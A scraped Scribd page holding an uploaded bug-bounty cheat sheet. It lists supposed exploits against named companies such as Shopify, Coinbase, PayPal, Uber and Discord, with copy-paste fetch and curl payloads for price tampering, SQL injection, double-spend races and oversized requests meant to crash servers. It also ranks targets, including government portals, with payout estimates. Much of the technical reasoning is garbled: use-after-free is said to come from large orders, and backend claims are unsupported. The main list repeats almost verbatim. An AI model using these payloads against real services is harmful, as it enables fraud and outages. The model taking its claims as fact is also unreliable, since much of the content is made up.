Thanks to visit codestin.com
Credit goes to www.scribd.com

Scribd
Upload
44 views13 pages

MT 1

The document outlines various critical memory vulnerabilities across multiple web applications, detailing specific exploits, API endpoints, and potential payouts. It categorizes the applications based on their backend technology and associated risks, highlighting the most lucrative programs for bug bounties. Additionally, it provides guidance on testing methods and patterns for detecting vulnerabilities in backend systems.

Uploaded by

tnyange909
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
44 views13 pages

MT 1

The document outlines various critical memory vulnerabilities across multiple web applications, detailing specific exploits, API endpoints, and potential payouts. It categorizes the applications based on their backend technology and associated risks, highlighting the most lucrative programs for bug bounties. Additionally, it provides guidance on testing methods and patterns for detecting vulnerabilities in backend systems.

Uploaded by

tnyange909
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 13

1.

Shopify (Memory Shadowing in Cart)


Frontend Event: "Add to Cart" button
API Endpoint: POST /cart/add.js
Exploit:
javascript
// Overwrite price in memory
fetch('/cart/add.js', {
method: 'POST',
body: JSON.stringify({ id: 123, quantity: 1, price: 0.01 })
});

Why?: Ruby on Rails caches cart data in memory.


Payout: 2,000–20,000
Report Example: Shopify Price Override

2. Coinbase (UAF in Trading Engine)


Frontend Event: "Buy Crypto" button
API Endpoint: POST /api/v3/brokerage/orders
Exploit:
javascript
// Trigger memory reuse with large orders
fetch('/api/v3/brokerage/orders', {
method: 'POST',
body: JSON.stringify({ size: "1000000", price: "0.01" })
});

Why?: C++ matching engine processes orders in shared memory.


Payout: 5,000–50,000

3. Uber (TOCTOU in Surge Pricing)


Frontend Event: "Confirm Ride" button
API Endpoint: POST /rt/rides
Exploit:
javascript
// Race condition to lock low price
Promise.all([
fetch('/rt/rides', { method: 'POST', body: JSON.stringify({ surge: 1.0 }) }),
fetch('/rt/rides', { method: 'POST', body: JSON.stringify({ surge: 100.0 }) })
]);

Why?: Java backend caches surge multipliers in RAM.


Payout: 1,000–10,000

4. Discord (Memory Exhaustion in Voice)


Frontend Event: "Join Voice Channel"
API Endpoint: PATCH /voice/servers/{id}
Exploit:
javascript
// Crash voice server with malformed bitrate
fetch('/voice/servers/123', {
method: 'PATCH',
body: JSON.stringify({ bitrate: 999999999 })
});

Why?: Erlang backend pre-allocates voice buffers.


Payout: 500–5,000

5. Rockstar Games (Type Juggling in GTA$)


Frontend Event: "Purchase GTA$" button
API Endpoint: POST /shop/confirm
Exploit:
javascript
// Bypass price validation with loose comparison
fetch('/shop/confirm', {
method: 'POST',
body: JSON.stringify({ amount: "1000000", currency: "USD " })
});

Why?: PHP backend uses == for currency checks.


Payout: 3,000–15,000
6. Verizon (Config Override in Billing)
Frontend Event: "Upgrade Plan" button
API Endpoint: POST /billing/subscriptions
Exploit:
javascript
// Overwrite in-memory plan limits
fetch('/billing/subscriptions', {
method: 'POST',
body: JSON.stringify({ plan_id: "premium", price: 0 })
});

Why?: Java Spring Boot reloads configs without validation.


Payout: 1,000–5,000

7. Etsy (Memory-Based SQLi in Coupons)


Frontend Event: "Apply Coupon" button
API Endpoint: POST /api/v3/cart/coupons
Exploit:
javascript
// Inject into cached query
fetch('/api/v3/cart/coupons', {
method: 'POST',
body: JSON.stringify({ code: "FREE' OR 1=1 --" })
});

Why?: Rails caches SQL query fragments.


Payout: 1,000–5,000

8. Slack (Cache Poisoning in Chat)


Frontend Event: "Send Message" button
API Endpoint: POST /chat.postMessage
Exploit:
javascript
// Poison in-memory message cache
fetch('/chat.postMessage', {
method: 'POST',
body: JSON.stringify({ channel: "general", text: "A".repeat(10_000_000) })
});

Why?: Redis cache lacks size validation.


Payout: 500–3,000

9. PayPal (TOCTOU in Transfers)


Frontend Event: "Send Money" button
API Endpoint: POST /v1/payments
Exploit:
javascript
// Double-spend race
Promise.all([
fetch('/v1/payments', { method: 'POST', body: JSON.stringify({ amount:
"1000" }) }),
fetch('/v1/payments', { method: 'POST', body: JSON.stringify({ amount: "1000" }) })
]);

Why?: Node.js caches balance checks.


Payout: 5,000–30,000

10. Cloudflare (Pointer Arithmetic in Workers)


Frontend Event: "Deploy Worker" button
API Endpoint: PUT /workers/scripts
Exploit:
javascript
// Corrupt WASM memory
fetch('/workers/scripts', {
method: 'PUT',
body: JSON.stringify({ script: "new WebAssembly.Memory({initial:10000})" })
});

Why?: C++ isolates WASM memory improperly.


Payout: 10,000–30,000
🚀 Top 40+ Web Apps for Critical Memory Vulnerabilities
(Sorted by backend risk profile)

1. High-Risk (C/C++/Rust Backends)


1. Cloudflare - Edge servers with memory-unsafe components
2. Shopify - Payment processors (C++)
3. Coinbase - Cryptocurrency trading engines
4. Binance - Exchange matching engines
5. Rockstar Games - Game backends (GTA Online)
6. Valve (Steam) - Inventory systems
7. Epic Games - Unreal Engine services
Why? These often have memory-unsafe code (UAF, heap overflows).

2. Java/Spring Boot Apps


8. Twitter - Caching layers
9. LinkedIn - Recommendation engines
10.Uber - Surge pricing systems
11.Airbnb - Booking workflows
12.Spotify - Playlist generators
13.Slack - Real-time messaging
14.Atlassian (Jira/Confluence) - Workflow rules
Look for: Memory shadowing in cached DTOs, TOCTOU in ticket systems.

3. Node.js/Python (High TOCTOU Risk)


15.Discord - Voice state updates
16.TikTok - Video processing queues
17.Reddit - Voting systems
18.Twitch - Stream tipping
19.Patreon - Subscription billing
20.Zoom - Meeting state handling
Attack vector: Race conditions in real-time systems.

4. E-Commerce (Memory Shadowing Hotspots)


21.Alibaba - Cart pricing engines
22.eBay - Auction closing logic
23.Etsy - Coupon stacking
24.Walmart - Inventory reservations
25.Target - Checkout flows
26.Best Buy - Price override APIs
Pro Tip: Test PATCH /cart/items/{id} endpoints.

5. FinTech/Banking (Critical Impact)


27.PayPal - Instant transfers
28.Stripe - Webhook processors
29.Revolut - Currency conversion
30.Chime - Overdraft logic
31.Robinhood - Stock settlement
32.Plaid - Account linking
Focus: TOCTOU in transaction sequencing.

6. SaaS/Enterprise (Business Logic)


33.Salesforce - Apex rule engine
34.Zendesk - Ticket prioritization
35.HubSpot - Workflow automation
36.Notion - Real-time collaboration
37.Airtable - Formula evaluation
Check: In-memory rule evaluation bypasses.

7. Government/Telco (Legacy Systems)


38.Verizon - Billing systems
39.T-Mobile - SIM swap APIs
40.U.S. Dept of Defense - Some legacy portals
41.EU Parliament - Document processing
Why? Often run unpatched C/C++ services.

🔥 Top 5 Programs for Critical Bugs


1. Cloudflare ($30k+ for RCE)
• Test: workers.dev memory isolation escapes
2. Shopify ($20k+ for cart tampering)
• Attack: POST /admin/price_overrides.json
3. Coinbase ($50k+ for UAF in trading engine)
• Target: WebSocket price feeds
4. Uber ($10k+ for surge pricing races)
• Endpoint: POST /surge/multiplier
5. Discord ($5k+ for voice state corruption)
• Test: PATCH /voice/servers/{id}

How to Test Safely


1. Use HackerOne’s sandboxes:
• Shopify: https://shopify.attacklabs.com
• Coinbase: https://coinbase-test.com

1. Prioritize endpoints with:


• Financial actions (/transfer)
• State changes (/cart, /inventory)
• Admin functions (/config)

Backend Detection Cheatsheet


Vulnerability HTTP Request Pattern Backend Tech Hint
Memory Large → Small JSON payloads
C/C++ responses (no X-Powered-
Reuse By)
TOCTOU Concurrent PATCH requests Java/Go (high-speed APIs)
Config PUT /v1/admin/settings Node.js (weak input val.)
Override
Session POST /auth/token + memory
PHP/WordPress
Pivoting headers

First 5 Tests to Run


1. Shopify Cart Tampering
http
• POST /cart/change.js HTTP/1.1
{"quantity":1,"id":123,"price":0}

• Discord Voice State Crash


http
• PATCH /voice/servers/123 HTTP/1.1
{"bitrate":"999999999"}

• Uber Surge Pricing Race


bash
• # Run in parallel:
curl -X POST https://api.uber.com/v1.2/surge -d '{"multiplier":1.0}'
curl -X POST https://api.uber.com/v1.2/surge -d '{"multiplier":100.0}'

• Cloudflare Worker Memory Escape


javascript
• // Worker code:
new WebAssembly.Memory({ initial: 10000 }); // OOM crash

• Coinbase Trading UAF


http
5. POST /ws HTTP/1.1
{"type":"subscribe","channels":[{"name":"ticker","product_ids":
["A"*1000000]}]}

1. Shopify ($$$ Critical)


Frontend Event: "Add to Cart" button
API Endpoint: POST /cart/add.js
Vulnerability: Memory Shadowing (Price Overwrite)
Exploit:
javascript
fetch('/cart/add.js', {
method: 'POST',
body: JSON.stringify({ id: 123, quantity: 1, price: 0 })
});

Why?: Frequent bounties for cart/price manipulation.


Payout: 2,000–20,000

2. Twitter (X) ($$$ High)


Frontend Event: "Tweet" button
API Endpoint: POST /graphql (Tweet mutation)
Vulnerability: Memory Corruption in Media Processing
Exploit:
javascript
// Upload malformed GIF to trigger UAF
const form = new FormData();
form.append('media', new Blob(["\x47\x49\x46\x38" + "A".repeat(10_000_000)]));
fetch('/api/media/upload', { method: 'POST', body: form });

Why?: C++ image processors in backend.


Payout: 3,000–15,000

3. Uber ($$ High)


Frontend Event: "Confirm Ride" button
API Endpoint: POST /rt/rides
Vulnerability: TOCTOU (Surge Pricing Race)
Exploit:
javascript
// Race condition
Promise.all([
fetch('/rt/rides', { method: 'POST', body: JSON.stringify({ surge: 1.0 }) }),
fetch('/rt/rides', { method: 'POST', body: JSON.stringify({ surge: 100.0 }) })
]);

Why?: Real-time pricing systems are race-prone.


Payout: 1,000–10,000

4. Discord ($$ Medium)


Frontend Event: "Join Voice Channel"
API Endpoint: PATCH /voice/servers/{id}
Vulnerability: Memory Exhaustion (Voice Server Crash)
Exploit:
javascript
fetch('/voice/servers/123', {
method: 'PATCH',
body: JSON.stringify({ bitrate: 999999999 })
});

Why?: Erlang/Go backends with memory limits.


Payout: 500–5,000

5. Coinbase ($$$ Critical)


Frontend Event: "Buy Crypto" button
API Endpoint: POST /api/v3/brokerage/orders
Vulnerability: UAF in Trading Engine
Exploit:
javascript
// Spam large orders to trigger memory reuse
fetch('/api/v3/brokerage/orders', {
method: 'POST',
body: JSON.stringify({ size: "1000000", price: "0.01" })
});

Why?: C++ matching engine.


Payout: 5,000–50,000
6. Verizon ($$ Medium)
Frontend Event: "Upgrade Plan" button
API Endpoint: POST /billing/subscriptions
Vulnerability: Config Override
Exploit:
javascript
fetch('/billing/subscriptions', {
method: 'POST',
body: JSON.stringify({ plan_id: "premium", price: 0 })
});

Why?: Legacy Java systems with weak validation.


Payout: 1,000–5,000

7. Rockstar Games ($$$ High)


Frontend Event: "Purchase GTA$" button
API Endpoint: POST /shop/confirm
Vulnerability: Type Juggling (Currency Exploit)
Exploit:
javascript
fetch('/shop/confirm', {
method: 'POST',
body: JSON.stringify({ amount: "1000000", currency: "USD " })
});

Why?: PHP loose comparisons.


Payout: 3,000–15,000

8. Slack ($$ Medium)


Frontend Event: "Send Message" button
API Endpoint: POST /chat.postMessage
Vulnerability: Memory Cache Poisoning
Exploit:
javascript
fetch('/chat.postMessage', {
method: 'POST',
body: JSON.stringify({
channel: "general",
text: "A".repeat(10_000_000) // OOM crash
})
});

Why?: Redis cache limits.


Payout: 500–3,000

9. Etsy ($$ Medium)


Frontend Event: "Apply Coupon" button
API Endpoint: POST /api/v3/cart/coupons
Vulnerability: Business Rule Injection
Exploit:
javascript
fetch('/api/v3/cart/coupons', {
method: 'POST',
body: JSON.stringify({
code: "FREESHIPPING' OR 1=1 --"
})
});

Why?: Ruby on Rails memory caching.


Payout: 1,000–5,000

10. PayPal ($$$ Critical)


Frontend Event: "Send Money" button
API Endpoint: POST /v1/payments
Vulnerability: TOCTOU (Double-Spend)
Exploit:
javascript
// Race two transfers from same balance
Promise.all([
fetch('/v1/payments', {
method: 'POST',
body: JSON.stringify({ amount: "1000" })
}),
fetch('/v1/payments', {
method: 'POST',
body: JSON.stringify({ amount: "1000" })
})
]);

Why?: Financial systems = high impact.


Payout: 5,000–30,000

You might also like